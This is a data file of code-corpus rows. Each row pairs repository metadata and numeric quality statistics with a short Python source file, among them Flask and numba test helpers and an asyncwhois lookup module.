| 26.428571 | 57 | 0.697297 | 22 | 185 | 5.863636 | 0.727273 | 0.27907 | 0.356589 | 0.434109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038217 | 0.151351 | 185 | 6 | 58 | 30.833333 | 0.783439 | 0 | 0 | 0 | 0 | 0 | 0.032432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d999932c0cb5d5f44969e6c0f4efde644db35bd1 | 107 | py | Python | monorun/__init__.py | minghanz/MonoRUn | 3a575ec7826d2b95e05bc87099b152434743f104 | [
"MIT"
] | 86 | 2021-03-24T02:10:17.000Z | 2022-03-30T03:35:41.000Z | monorun/__init__.py | minghanz/MonoRUn | 3a575ec7826d2b95e05bc87099b152434743f104 | [
"MIT"
] | 5 | 2021-06-03T09:23:30.000Z | 2022-03-30T09:13:26.000Z | monorun/__init__.py | minghanz/MonoRUn | 3a575ec7826d2b95e05bc87099b152434743f104 | [
"MIT"
] | 10 | 2021-05-18T04:15:39.000Z | 2021-11-25T09:32:05.000Z | from .core import *
from .datasets import *
from .models import *
from .ops import *
from .runner import *
| 17.833333 | 23 | 0.719626 | 15 | 107 | 5.133333 | 0.466667 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186916 | 107 | 5 | 24 | 21.4 | 0.885057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
795eef20281b050104b8307eb723e72711efa115 | 153 | py | Python | example/blueprints/testblueprint.py | MaayanLab/jupyter-template | dd05bfcb95c9eafb1a9df845b5d8fecae1d6b9d5 | [
"Apache-2.0"
] | null | null | null | example/blueprints/testblueprint.py | MaayanLab/jupyter-template | dd05bfcb95c9eafb1a9df845b5d8fecae1d6b9d5 | [
"Apache-2.0"
] | 24 | 2020-04-07T17:04:47.000Z | 2020-05-27T00:51:25.000Z | example/blueprints/testblueprint.py | MaayanLab/jupyter-template | dd05bfcb95c9eafb1a9df845b5d8fecae1d6b9d5 | [
"Apache-2.0"
] | null | null | null | from flask import Blueprint
testblueprint = Blueprint('testblueprint', __name__)
@testblueprint.route('/')
def testroute():
return 'Test Blueprint!'
| 19.125 | 52 | 0.75817 | 15 | 153 | 7.466667 | 0.733333 | 0.392857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 153 | 7 | 53 | 21.857143 | 0.82963 | 0 | 0 | 0 | 0 | 0 | 0.189542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0.8 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 6 |
7983f56eea93961f9c0a70fd423f832389ff4cae | 1,548 | py | Python | dev/Gems/CloudGemMetric/v1/AWS/common-code/Lib/numba/tests/complex_usecases.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 1,738 | 2017-09-21T10:59:12.000Z | 2022-03-31T21:05:46.000Z | dev/Gems/CloudGemMetric/v1/AWS/common-code/Lib/numba/tests/complex_usecases.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 427 | 2017-09-29T22:54:36.000Z | 2022-02-15T19:26:50.000Z | dev/Gems/CloudGemMetric/v1/AWS/common-code/Lib/numba/tests/complex_usecases.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 671 | 2017-09-21T08:04:01.000Z | 2022-03-29T14:30:07.000Z | from __future__ import division
import cmath
def div_usecase(x, y):
return x / y
def real_usecase(x):
return x.real
def imag_usecase(x):
return x.imag
def conjugate_usecase(x):
return x.conjugate()
def acos_usecase(x):
return cmath.acos(x)
def cos_usecase(x):
return cmath.cos(x)
def asin_usecase(x):
return cmath.asin(x)
def sin_usecase(x):
return cmath.sin(x)
def atan_usecase(x):
return cmath.atan(x)
def tan_usecase(x):
return cmath.tan(x)
def acosh_usecase(x):
return cmath.acosh(x)
def cosh_usecase(x):
return cmath.cosh(x)
def asinh_usecase(x):
return cmath.asinh(x)
def sinh_usecase(x):
return cmath.sinh(x)
def atanh_usecase(x):
return cmath.atanh(x)
def tanh_usecase(x):
return cmath.tanh(x)
def exp_usecase(x):
return cmath.exp(x)
def isfinite_usecase(x):
return cmath.isfinite(x)
def isinf_usecase(x):
return cmath.isinf(x)
def isnan_usecase(x):
return cmath.isnan(x)
def log_usecase(x):
return cmath.log(x)
def log_base_usecase(x, base):
return cmath.log(x, base)
def log10_usecase(x):
return cmath.log10(x)
def phase_usecase(x):
return cmath.phase(x)
def polar_usecase(x):
return cmath.polar(x)
_two = 2.0
def polar_as_complex_usecase(x):
# HACK: clear errno by invoking float.__pow__
# (workaround for http://bugs.python.org/issue24489)
_two ** _two
return complex(*cmath.polar(x))
def rect_usecase(r, phi):
return cmath.rect(r, phi)
def sqrt_usecase(x):
return cmath.sqrt(x)
| 16.125 | 56 | 0.686693 | 254 | 1,548 | 4.019685 | 0.228346 | 0.211557 | 0.329089 | 0.390793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008807 | 0.193152 | 1,548 | 95 | 57 | 16.294737 | 0.808647 | 0.060724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0 | 0.033333 | 0.45 | 0.966667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
798a25e1048ad9409d29b44bdfd6e8a7a4ae1be0 | 36 | py | Python | test/test_series/__init__.py | clebsonpy/HydroComp | 9d17fa533e8a15c760030df5246ff531ddb4cb22 | [
"MIT"
] | 4 | 2020-05-14T20:03:49.000Z | 2020-05-22T19:56:43.000Z | test/test_series/__init__.py | clebsonpy/HydroComp | 9d17fa533e8a15c760030df5246ff531ddb4cb22 | [
"MIT"
] | 19 | 2019-06-27T18:12:27.000Z | 2020-04-28T13:28:03.000Z | test/test_series/__init__.py | clebsonpy/HydroComp | 9d17fa533e8a15c760030df5246ff531ddb4cb22 | [
"MIT"
] | null | null | null | from re import I
from .flow import * | 18 | 19 | 0.75 | 7 | 36 | 3.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194444 | 36 | 2 | 19 | 18 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
79b88b6871ed2dfa7793027f730e6f6e3d5e5fbd | 252 | py | Python | localhost/_core/controller.py | KnJbMfLAgdkwZL/discord_webm_2ch_bot | 18ce95f9d4b92c30079a4dbb2144dddaace00d03 | [
"MIT"
] | null | null | null | localhost/_core/controller.py | KnJbMfLAgdkwZL/discord_webm_2ch_bot | 18ce95f9d4b92c30079a4dbb2144dddaace00d03 | [
"MIT"
] | null | null | null | localhost/_core/controller.py | KnJbMfLAgdkwZL/discord_webm_2ch_bot | 18ce95f9d4b92c30079a4dbb2144dddaace00d03 | [
"MIT"
] | null | null | null | class controller:
    def __init__(self):
        # print(f'Constructor {self.getName()}')
        pass

    def __del__(self):
        # print(f'Destructor {self.getName()}')
        pass

    def getName(self):
        return self.__class__.__name__
| 21 | 48 | 0.587302 | 27 | 252 | 4.888889 | 0.518519 | 0.136364 | 0.151515 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 252 | 11 | 49 | 22.909091 | 0.733333 | 0.301587 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.285714 | 0 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
8db9aba9a9e7e116173a2557a47f23c1b9565fda | 43 | py | Python | sdk/exception/system_exception.py | CLG0125/elemesdk | 344466398bad7cf026e082e47c77d3ca98621ef3 | [
"MIT"
] | 1 | 2021-04-03T05:11:29.000Z | 2021-04-03T05:11:29.000Z | sdk/exception/system_exception.py | CLG0125/elemesdk | 344466398bad7cf026e082e47c77d3ca98621ef3 | [
"MIT"
] | null | null | null | sdk/exception/system_exception.py | CLG0125/elemesdk | 344466398bad7cf026e082e47c77d3ca98621ef3 | [
"MIT"
] | null | null | null |
class SystemException(Exception): pass
| 14.333333 | 37 | 0.767442 | 4 | 43 | 8.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 3 | 38 | 14.333333 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
30e20a7de1623a9f749b570f10aebdd46b14170b | 101 | py | Python | pyhiveodbc/__init__.py | bi4group/PyHiveODBC | 5cc42912cc90f817eeb2a75efa277d330cc9710d | [
"Apache-2.0"
] | 2 | 2018-05-04T18:13:47.000Z | 2018-12-05T08:46:29.000Z | pyhiveodbc/__init__.py | bi4group/PyHiveODBC | 5cc42912cc90f817eeb2a75efa277d330cc9710d | [
"Apache-2.0"
] | null | null | null | pyhiveodbc/__init__.py | bi4group/PyHiveODBC | 5cc42912cc90f817eeb2a75efa277d330cc9710d | [
"Apache-2.0"
] | 2 | 2020-01-29T05:26:02.000Z | 2020-10-13T14:30:42.000Z | from __future__ import absolute_import
from __future__ import unicode_literals
__version__ = '0.5.1'
| 25.25 | 39 | 0.841584 | 14 | 101 | 5.071429 | 0.714286 | 0.28169 | 0.450704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.108911 | 101 | 3 | 40 | 33.666667 | 0.755556 | 0 | 0 | 0 | 0 | 0 | 0.049505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
30e9bff121a5294a667a70eb6c935a86eecb9cfe | 134 | py | Python | tests/test_index.py | kmbn/zeit-now-filter-feeds | a138b5d5f4b5113ad0f64dea9db1f1fd0d2cf687 | [
"MIT"
] | null | null | null | tests/test_index.py | kmbn/zeit-now-filter-feeds | a138b5d5f4b5113ad0f64dea9db1f1fd0d2cf687 | [
"MIT"
] | null | null | null | tests/test_index.py | kmbn/zeit-now-filter-feeds | a138b5d5f4b5113ad0f64dea9db1f1fd0d2cf687 | [
"MIT"
] | null | null | null | """Tests for index.py."""
def test_filter_feed():
    # TODO: Add data directory with sample feeds and complete this test.
    pass
| 19.142857 | 72 | 0.686567 | 20 | 134 | 4.5 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208955 | 134 | 6 | 73 | 22.333333 | 0.849057 | 0.649254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
eb6368aa32bedbdee8322667625a0f39a8190a4e | 46 | py | Python | onadata/libs/utils/nose_plugins/__init__.py | gushil/kobocat | 5ce27ed5fbf969b2ce68e8a59dd97ced74686711 | [
"BSD-2-Clause"
] | 38 | 2017-02-28T05:39:40.000Z | 2019-01-16T04:39:04.000Z | onadata/libs/utils/nose_plugins/__init__.py | gushil/kobocat | 5ce27ed5fbf969b2ce68e8a59dd97ced74686711 | [
"BSD-2-Clause"
] | 48 | 2019-03-18T09:26:31.000Z | 2019-05-27T08:12:03.000Z | onadata/libs/utils/nose_plugins/__init__.py | gushil/kobocat | 5ce27ed5fbf969b2ce68e8a59dd97ced74686711 | [
"BSD-2-Clause"
] | 5 | 2017-02-22T12:25:19.000Z | 2019-01-15T11:16:40.000Z | from SilenceSouth import SilenceSouth # noqa
| 23 | 45 | 0.826087 | 5 | 46 | 7.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 1 | 46 | 46 | 0.974359 | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb7ffc2878894c014a972376cffbef7ca2acedde | 35 | py | Python | catkin_ws/simulation/rviz_tools_py-master/src/rviz_tools_py/__init__.py | fontysrobotics/Blackboard_based_distributed_fleet_manager | a6b44738fe67f4948a69f8d45da58d981c6724e0 | [
"BSD-3-Clause"
] | 79 | 2020-04-23T04:39:00.000Z | 2022-03-08T09:50:09.000Z | catkin_ws/simulation/rviz_tools_py-master/src/rviz_tools_py/__init__.py | fontysrobotics/Blackboard_based_distributed_fleet_manager | a6b44738fe67f4948a69f8d45da58d981c6724e0 | [
"BSD-3-Clause"
] | 1 | 2020-04-23T10:18:50.000Z | 2020-04-23T10:18:50.000Z | catkin_ws/simulation/rviz_tools_py-master/src/rviz_tools_py/__init__.py | fontysrobotics/Blackboard_based_distributed_fleet_manager | a6b44738fe67f4948a69f8d45da58d981c6724e0 | [
"BSD-3-Clause"
] | 29 | 2020-04-23T07:49:15.000Z | 2022-03-26T11:48:53.000Z | from rviz_tools import RvizMarkers
| 17.5 | 34 | 0.885714 | 5 | 35 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb9be2534c341f91e66f0f6ca6ff0226c416347b | 114 | py | Python | dpaste/contribute.py | mozafrank/dpaste | 3be4bd13075ace2b4b9530172162b1af35bbd0d2 | [
"MIT"
] | null | null | null | dpaste/contribute.py | mozafrank/dpaste | 3be4bd13075ace2b4b9530172162b1af35bbd0d2 | [
"MIT"
] | null | null | null | dpaste/contribute.py | mozafrank/dpaste | 3be4bd13075ace2b4b9530172162b1af35bbd0d2 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def contrib_file(request):
    return render(request, 'dpaste/contribute.html')
| 22.8 | 49 | 0.807018 | 15 | 114 | 6.066667 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096491 | 114 | 4 | 50 | 28.5 | 0.883495 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
ebe4cbeb2f61cd4e37a6614ab91c5e19c2358f54 | 32 | py | Python | pontoon/tags/tests/conftest.py | foss4/pontoon | 0503cc78f00e1e9d23c1ca885fe74a627563fc82 | [
"BSD-3-Clause"
] | 1,145 | 2015-05-15T01:08:16.000Z | 2022-03-31T14:23:45.000Z | pontoon/tags/tests/conftest.py | foss4/pontoon | 0503cc78f00e1e9d23c1ca885fe74a627563fc82 | [
"BSD-3-Clause"
] | 1,365 | 2015-05-04T21:54:18.000Z | 2022-03-30T16:53:49.000Z | pontoon/tags/tests/conftest.py | foss4/pontoon | 0503cc78f00e1e9d23c1ca885fe74a627563fc82 | [
"BSD-3-Clause"
] | 667 | 2015-05-04T21:33:45.000Z | 2022-03-30T10:25:33.000Z | from .fixtures import * # noqa
| 16 | 31 | 0.6875 | 4 | 32 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 32 | 1 | 32 | 32 | 0.88 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6905dd059134296c87151d3dce08e5a992d15fc7 | 50 | py | Python | utils/__init__.py | SBU-BMI/deep_survival_analysis | 1953155f329ffdb884133ab187046b312844d320 | [
"BSD-3-Clause"
] | null | null | null | utils/__init__.py | SBU-BMI/deep_survival_analysis | 1953155f329ffdb884133ab187046b312844d320 | [
"BSD-3-Clause"
] | null | null | null | utils/__init__.py | SBU-BMI/deep_survival_analysis | 1953155f329ffdb884133ab187046b312844d320 | [
"BSD-3-Clause"
] | null | null | null | from .utils import *
from .pytorch_utils import *
| 16.666667 | 28 | 0.76 | 7 | 50 | 5.285714 | 0.571429 | 0.594595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 50 | 2 | 29 | 25 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
69187928745023645c6634409ac303f8537488d7 | 3,904 | py | Python | asyncwhois/__init__.py | pogzyb/asyncwhois | 44c74184a3b713ec9bdc7322cb7b78d41ea24756 | [
"MIT"
] | 25 | 2020-06-09T00:39:25.000Z | 2022-02-21T08:54:09.000Z | asyncwhois/__init__.py | pogzyb/asyncwhois | 44c74184a3b713ec9bdc7322cb7b78d41ea24756 | [
"MIT"
] | 17 | 2020-04-27T09:35:00.000Z | 2022-02-15T01:56:16.000Z | asyncwhois/__init__.py | pogzyb/asyncwhois | 44c74184a3b713ec9bdc7322cb7b78d41ea24756 | [
"MIT"
] | 4 | 2020-07-10T23:06:46.000Z | 2022-01-22T10:30:04.000Z | from typing import Any, Optional
from .pywhois import PyWhoIs
__all__ = [
    'lookup',
    'aio_lookup',
    'whois_cmd_shell',
    'aio_whois_cmd_shell',
    'rdap_domain_lookup',
    'aio_rdap_domain_lookup'
]
__version__ = '0.4.1'
def lookup(url: str, timeout: int = 10) -> PyWhoIs:
    """
    Module entry point for whois lookups. Opens a socket connection to the
    whois server, submits a query, and then parses the query output from the server
    into a dictionary. Uses "socket.create_connection()" for the socket.
    Raises "QueryError" if connection to a server times out or fails.
    Raises "NotFoundError" if domain record is "not found" on the server.

    :param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
    :param timeout: whois server connection timeout (default 10 seconds)
    :return: instance of PyWhoIs with "query_output" and "parser_output" attributes
    """
    whois = PyWhoIs._from_url(url, timeout)
    return whois

def whois_cmd_shell(url: str, timeout: int = 10) -> PyWhoIs:
    """
    Equivalent to running "whois <domain>" from the shell. Uses subprocess.Popen().

    :param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
    :param timeout: whois server connection timeout (default 10 seconds)
    :return: instance of PyWhoIs with "query_output" and "parser_output" attributes
    """
    whois = PyWhoIs._from_whois_cmd(url, timeout)
    return whois

async def aio_lookup(url: str, timeout: int = 10) -> PyWhoIs:
    """
    Asynchronous module entry point for whois lookups. Opens a socket connection to the
    whois server, submits a query, and then parses the query output from the server
    into a dictionary. Uses "asyncio.open_connection()" for the socket.
    Raises "QueryError" if connection to a server times out or fails.
    Raises "NotFoundError" if domain record is "not found" on the server.

    :param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
    :param timeout: whois server connection timeout (default 10 seconds)
    :return: instance of PyWhoIs with "query_output" and "parser_output" attributes
    """
    whois = await PyWhoIs._aio_from_url(url, timeout)
    return whois

def rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:
    """
    Runs an RDAP query for the given url.

    :param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
    :param http_client: Optional HTTP Client such as `httpx.Client` or `requests.Session`
    :return: instance of PyWhoIs with "query_output" and "parser_output" attributes
    """
    whois = PyWhoIs._rdap_domain_from_url(url, http_client)
    return whois

async def aio_rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:
    """
    Runs an RDAP query for the given url.

    :param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
    :param http_client: Optional Async HTTP Client such as `httpx.AsyncClient`
    :return: instance of PyWhoIs with "query_output" and "parser_output" attributes
    """
    whois = await PyWhoIs._aio_rdap_domain_from_url(url, http_client)
    return whois

async def aio_whois_cmd_shell(url: str, timeout: int = 10) -> PyWhoIs:
    """
    Equivalent to running "whois <domain>" from the shell. Leverages "asyncio.subprocess".
    IMPORTANT: Raises "NotImplementedError" if running on Windows and the event loop is
    not set to be type "asyncio.ProactorEventLoop". Must set: loop = asyncio.ProactorEventLoop()

    :param url: Any correctly formatted URL (e.g. https://en.wikipedia.org/wiki/WHOIS)
    :param timeout: whois server connection timeout (default 10 seconds)
    :return: instance of PyWhoIs with "query_output" and "parser_output" attributes
    """
    whois = await PyWhoIs._aio_from_whois_cmd(url, timeout)
    return whois
| 39.836735 | 96 | 0.718494 | 548 | 3,904 | 4.989051 | 0.198905 | 0.032187 | 0.02414 | 0.043892 | 0.851134 | 0.831748 | 0.831748 | 0.768105 | 0.768105 | 0.768105 | 0 | 0.005999 | 0.188781 | 3,904 | 97 | 97 | 40.247423 | 0.857278 | 0.304559 | 0 | 0.206897 | 0 | 0 | 0.083627 | 0.019366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.37931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
694f0b480c0c41a25c9df778d7727b1719cb8c95 | 37 | py | Python | fetcher/__init__.py | molkoback/Fab-Lab-Tokens | 07e9e250931cf344610561108fe199eed257d9b8 | [
"MIT"
] | null | null | null | fetcher/__init__.py | molkoback/Fab-Lab-Tokens | 07e9e250931cf344610561108fe199eed257d9b8 | [
"MIT"
] | null | null | null | fetcher/__init__.py | molkoback/Fab-Lab-Tokens | 07e9e250931cf344610561108fe199eed257d9b8 | [
"MIT"
] | 1 | 2018-10-17T07:05:12.000Z | 2018-10-17T07:05:12.000Z | from .fetcher import DocumentFetcher
| 18.5 | 36 | 0.864865 | 4 | 37 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.969697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |